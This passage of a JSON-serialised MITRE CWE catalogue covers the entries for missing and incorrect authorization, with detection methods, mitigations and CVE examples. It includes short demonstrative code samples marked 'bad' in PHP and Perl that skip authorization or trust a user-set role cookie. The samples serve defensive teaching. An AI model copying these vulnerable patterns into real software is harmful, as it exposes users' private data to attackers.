execution."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}},{"attr":{"@_Name":"Database Server","@_Prevalence":"Often"}}]},"Background_Details":{"Background_Detail":"An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: \\"No access\\", \\"Read access\\", \\"Change access\\", and \\"Full control\\". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object."},"Alternate_Terms":{"Alternate_Term":{"Term":"AuthZ","Description":"\\"AuthZ\\" is typically used as an abbreviation of \\"authorization\\" within the web application security community. It is distinct from \\"AuthN\\" (or, sometimes, \\"AuthC\\") which is an abbreviation of \\"authentication.\\" The use of \\"Auth\\" as an abbreviation is discouraged, since it could be used for either authentication or authorization."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":{"xhtml:p":["OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase.","Authorization weaknesses may arise when a single-user application is ported to a multi-user environment."]}},{"Phase":"Implementation","Note":"A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"An attacker could read sensitive data, either by reading the data directly from a data store that is not restricted, or by accessing insufficiently-protected, privileged functionality to read the data."},{"Scope":"Integrity","Impact":["Modify Application Data","Modify Files or Directories"],"Note":"An attacker could modify sensitive data, either by writing the data directly to a data store that is not restricted, or by accessing insufficiently-protected, privileged functionality to write the data."},{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"],"Note":"An attacker could gain privileges by modifying or reading critical data directly, or by accessing privileged functionality."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-6"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries.","Generally, automated static analysis tools have difficulty detecting custom authorization schemes. In addition, the software\'s design may include some functionality that is accessible to any user and does not require an authorization check; an automated technique that detects the absence of authorization may report false positives."]},"Effectiveness":"Limited"},{"Method":"Automated Dynamic Analysis","Description":"Automated dynamic analysis may find many or all possible interfaces that do not require authorization, but manual analysis is required to determine if the lack of authorization violates business logic."},{"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms."]},"Effectiveness":"Moderate","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints."},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host Application Interface Scanner","Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.","Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role."]}},{"Phase":"Architecture and Design","Description":"Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient\'s doctor [REF-7]."},{"attr":{"@_Mitigation_ID":"MIT-4.4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45]."]}},{"Phase":"Architecture and Design","Description":{"xhtml:p":["For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.","One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page."]}},{"Phase":["System Configuration","Installation"],"Description":"Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a \\"default deny\\" policy when defining these ACLs."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-95"},"Intro_Text":"This function runs an arbitrary SQL query on a given database, returning the result of the query.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function runEmployeeQuery($dbName, $name){}$employeeRecord = runEmployeeQuery(\'EmployeeDB\',$_GET[\'EmployeeName\']);","xhtml:div":{"#text":"mysql_select_db($dbName,$globalDbHandle) or die(\\"Could not open Database\\".$dbName);$preparedStatement = $globalDbHandle-&gt;prepare(\'SELECT * FROM employees WHERE name = :name\');$preparedStatement-&gt;execute(array(\':name\' =&gt; $name));return $preparedStatement-&gt;fetchAll();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:i":"//Use a prepared statement to avoid CWE-89"},"xhtml:br":["","",""],"xhtml:i":"/.../"}},"Body_Text":"While this code is careful to avoid SQL Injection, the function does not confirm the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database."},{"attr":{"@_Demonstrative_Example_ID":"DX-96"},"Intro_Text":"The following program could be part of a bulletin board system that allows users to send private messages to each other. This program intends to authenticate the user before deciding whether a private message should be displayed. Assume that LookupMessageObject() ensures that the $id argument is numeric, constructs a filename based on that id, and reads the message details from that file. Also assume that the program stores all private messages for all users in the same directory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"sub DisplayPrivateMessage {}my $q = new CGI;if (! AuthenticateUser($q-&gt;param(\'username\'), $q-&gt;param(\'password\'))) {}my $id = $q-&gt;param(\'id\');DisplayPrivateMessage($id);","xhtml:div":[{"#text":"my($id) = @_;my $Message = LookupMessageObject($id);print \\"From: \\" . encodeHTML($Message-&gt;{from}) . \\"&lt;br&gt;\\\\n\\";print \\"Subject: \\" . encodeHTML($Message-&gt;{subject}) . \\"\\\\n\\";print \\"&lt;hr&gt;\\\\n\\";print \\"Body: \\" . encodeHTML($Message-&gt;{body}) . \\"\\\\n\\";","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"#text":"ExitError(\\"invalid username or password\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","","","","","","","","",""],"xhtml:i":["# For purposes of this example, assume that CWE-309 and","# CWE-523 do not apply."]}},"Body_Text":["While the program properly exits if authentication fails, it does not ensure that the message is addressed to the user. As a result, an authenticated attacker could provide any arbitrary identifier and read private messages that were intended for other users.","One way to avoid this problem would be to ensure that the \\"to\\" field in the message object matches the username of the authenticated user."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-3168","Description":"Web application does not restrict access to admin scripts, allowing authenticated users to reset administrative passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3168"},{"Reference":"CVE-2009-3597","Description":"Web application stores database file under the web root with insufficient access control (CWE-219), allowing direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3597"},{"Reference":"CVE-2009-2282","Description":"Terminal server does not check authorization for guest access.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2282"},{"Reference":"CVE-2008-5027","Description":"System monitoring software allows users to bypass authorization by creating custom forms.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5027"},{"Reference":"CVE-2009-3781","Description":"Content management system does not check access permissions for private files, allowing others to view those files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3781"},{"Reference":"CVE-2008-6548","Description":"Product does not check the ACL of a page accessed using an \\"include\\" directive, allowing attackers to read unauthorized files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6548"},{"Reference":"CVE-2009-2960","Description":"Web application does not restrict access to admin scripts, allowing authenticated users to modify passwords of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2960"},{"Reference":"CVE-2009-3230","Description":"Database server does not use appropriate privileges for certain sensitive operations.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3230"},{"Reference":"CVE-2009-2213","Description":"Gateway uses default \\"Allow\\" configuration for its authorization settings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2213"},{"Reference":"CVE-2009-0034","Description":"Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0034"},{"Reference":"CVE-2008-6123","Description":"Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6123"},{"Reference":"CVE-2008-7109","Description":"Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7109"},{"Reference":"CVE-2008-3424","Description":"Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3424"},{"Reference":"CVE-2005-1036","Description":"Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1036"},{"Reference":"CVE-2008-4577","Description":"ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4577"},{"Reference":"CVE-2007-2925","Description":"Default ACL list for a DNS server does not set certain ACLs, allowing unauthorized DNS queries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2925"},{"Reference":"CVE-2006-6679","Description":"Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6679"},{"Reference":"CVE-2005-3623","Description":"OS kernel does not check for a certain privilege before setting ACLs for files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3623"},{"Reference":"CVE-2005-2801","Description":"Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2801"},{"Reference":"CVE-2001-1155","Description":"Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155"},{"Reference":"CVE-2020-17533","Description":"Chain: unchecked return value (CWE-252) of some functions for policy enforcement leads to authorization bypass (CWE-862)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17533"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"665"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-229"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 4, &#34;Authorization&#34; Page 114; Chapter 6, &#34;Determining&#xA;                  Appropriate Access Control&#34; Page 171"}},{"attr":{"@_External_Reference_ID":"REF-231"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-233"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Common Vulnerabilities of Authorization&#34;, Page 39"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-05-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"}]}},"863":{"attr":{"@_ID":"863","@_Name":"Incorrect Authorization","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. This allows attackers to bypass intended access restrictions.","Extended_Description":{"xhtml:p":["Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user\'s privileges and any permissions or other access-control specifications that apply to the resource.","When access control checks are incorrectly applied, users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}},{"attr":{"@_Name":"Database Server","@_Prevalence":"Often"}}]},"Background_Details":{"Background_Detail":"An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: \\"No access\\", \\"Read access\\", \\"Change access\\", and \\"Full control\\". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object."},"Alternate_Terms":{"Alternate_Term":{"Term":"AuthZ","Description":"\\"AuthZ\\" is typically used as an abbreviation of \\"authorization\\" within the web application security community. It is distinct from \\"AuthN\\" (or, sometimes, \\"AuthC\\") which is an abbreviation of \\"authentication.\\" The use of \\"Auth\\" as an abbreviation is discouraged, since it could be used for either authentication or authorization."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Authorization weaknesses may arise when a single-user application is ported to a multi-user environment."},{"Phase":"Implementation","Note":{"xhtml:p":["REALIZATION: This weakness is caused during implementation of an architectural security tactic.","A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies."]}},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"],"Note":"An attacker could read sensitive data, either by reading the data directly from a data store that is not correctly restricted, or by accessing insufficiently-protected, privileged functionality to read the data."},{"Scope":"Integrity","Impact":["Modify Application Data","Modify Files or Directories"],"Note":"An attacker could modify sensitive data, either by writing the data directly to a data store that is not correctly restricted, or by accessing insufficiently-protected, privileged functionality to write the data."},{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"],"Note":"An attacker could gain privileges by modifying or reading critical data directly, or by accessing privileged functionality."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-6"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries.","Generally, automated static analysis tools have difficulty detecting custom authorization schemes. Even if they can be customized to recognize these schemes, they might not be able to tell whether the scheme correctly performs the authorization in a way that cannot be bypassed or subverted by an attacker."]},"Effectiveness":"Limited"},{"Method":"Automated Dynamic Analysis","Description":"Automated dynamic analysis may not be able to find interfaces that are protected by authorization checks, even if those checks contain weaknesses."},{"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms."]},"Effectiveness":"Moderate","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints."},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host Application Interface Scanner","Fuzz Tester","Framework-based Fuzzer","Forced Path Execution","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["Divide the software into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.","Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role."]}},{"Phase":"Architecture and Design","Description":"Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient\'s doctor [REF-7]."},{"attr":{"@_Mitigation_ID":"MIT-4.4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45]."]}},{"Phase":"Architecture and Design","Description":{"xhtml:p":["For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.","One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page."]}},{"Phase":["System Configuration","Installation"],"Description":"Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a \\"default deny\\" policy when defining these ACLs."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code could be for a medical records application. It displays a record to already authenticated users, confirming the user\'s authorization using a value stored in a cookie.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$role = $_COOKIES[\'role\'];if (!$role) {}if ($role == \'Reader\') {}else{}","xhtml:br":["","",""],"xhtml:div":[{"#text":"$role = getRole(\'user\');if ($role) {}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":[{"#text":"// save the cookie to send out in future responsessetcookie(\\"role\\", $role, time()+60*60*2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"ShowLoginScreen();die(\\"\\\\n\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]},{"#text":"DisplayMedicalHistory($_POST[\'patient_ID\']);","attr":{"@_style":"margin-left:10px;"}},{"#text":"die(\\"You are not Authorized to view this record\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"The programmer expects that the cookie will only be set when getRole() succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie. However, the attacker can easily set the \\"role\\" cookie to the value \\"Reader\\". As a result, the $role variable is \\"Reader\\", and getRole() is never invoked. The attacker has bypassed the authorization system."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-15900","Description":"Chain: sscanf() call is used to check if a username and group exists, but the return value of sscanf() call is not checked (CWE-252), causing an uninitialized variable to be checked (CWE-457), returning success to allow authorization bypass for executing a privileged (CWE-863).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15900"},{"Reference":"CVE-2009-2213","Description":"Gateway uses default \\"Allow\\" configuration for its authorization settings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2213"},{"Reference":"CVE-2009-0034","Description":"Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0034"},{"Reference":"CVE-2008-6123","Description":"Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6123"},{"Reference":"CVE-2008-7109","Description":"Chain: reliance on client-side security (CWE-602) allows attackers to bypass authorization using a custom client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7109"},{"Reference":"CVE-2008-3424","Description":"Chain: product does not properly handle wildcards in an authorization policy list, allowing unintended access.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3424"},{"Reference":"CVE-2008-4577","Description":"ACL-based protection mechanism treats negative access rights as if they are positive, allowing bypass of intended restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4577"},{"Reference":"CVE-2006-6679","Description":"Product relies on the X-Forwarded-For HTTP header for authorization, allowing unintended access by spoofing the header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6679"},{"Reference":"CVE-2005-2801","Description":"Chain: file-system code performs an incorrect comparison (CWE-697), preventing default ACLs from being properly applied.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2801"},{"Reference":"CVE-2001-1155","Description":"Chain: product does not properly check the result of a reverse DNS lookup because of operator precedence (CWE-783), allowing bypass of DNS-based access restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1155"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-229"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 4, &#34;Authorization&#34; Page 114; Chapter 6, &#34;Determining&#xA;                  Appropriate Access Control&#34; Page 171"}},{"attr":{"@_External_Reference_ID":"REF-231"}},{"attr":{"@_External_Reference_ID":"REF-233"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Common Vulnerabilities of Authorization&#34;, Page 39"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2011-05-24"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, 